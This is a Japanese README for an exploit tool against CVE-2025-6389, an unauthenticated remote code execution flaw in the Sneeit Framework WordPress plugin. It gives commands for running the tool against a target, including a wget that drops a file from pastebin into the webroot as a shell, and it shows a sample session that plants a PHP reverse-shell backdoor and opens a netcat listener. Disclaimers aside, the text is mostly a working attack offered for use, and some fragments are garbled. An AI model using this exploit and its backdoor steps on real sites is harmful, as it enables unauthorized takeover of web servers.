
CVE-2025-6389
wp_vul_theme
CVE-2025-6389 は、人気テーマで広く使用されている Sneeit Framework WordPressプラグイン(≤ 8.3)における Critical(CVSS 9.8) の脆弱性です。 認証不要のリモートコード実行 を可能にします。これはWeb脆弱性の中で最も危険なクラスです。
# 依存関係のインストール
pip3 install requests colorama
# 脆弱性チェック + 対話型シェルの取得
python3 CVE-2025-6389.py https://target.com
# 単一コマンドのみ実行
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
assert + die のおかげ)このツールは、正式に許可された ターゲット(明確なスコープとRoE)に対してのみ使用してください。
この脆弱性は現在も 野外で大量に悪用 されています。
エクスプロイトが 実際に動作した 場合、ターミナルに表示される内容は以下のとおりです(Sneeit Framework ≤ 8.3 を実行する脆弱性ターゲットに対するCVE-2025-6389の100%成功例):
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…
<h1>PHP Version 8.1.29</h1>
… (full phpinfo() page continues for thousands of lines)
RCE $> whoami
[+] Output:
www-data
RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php
[+] Output:
--2025-11-25 23:11:45-- https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’
backdoor.php 100%[===================>] 5.37K --.-KB/s in 0.001s
次に自分のマシンで:
nc -lvnp 4444
→ www-data として完全にインタラクティブなリバースシェルが即座に取得できます。
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(nothing / empty response / normal WordPress AJAX response / 403 / 500 without output)
以下のいずれかが見られた場合、攻撃成功です:
以上です。上記のいずれかが得られた場合 → 完全な認証不要のRCEが達成されています。
動作したかどうかを100%確認したい場合は、実際の出力をここに貼り付けてください。
sneeit_articles_pagination_callback()call_user_func() に渡される → 任意コード実行この情報は防御および教育目的のみで提供されています 🛡️。 自分が所有していない、または明示的なテスト許可を得ていないシステムを悪用するために使用しないでください 🚫。 セキュリティ脆弱性に関する作業では、常に法的および倫理的ガイドラインに従ってください ⚖️✨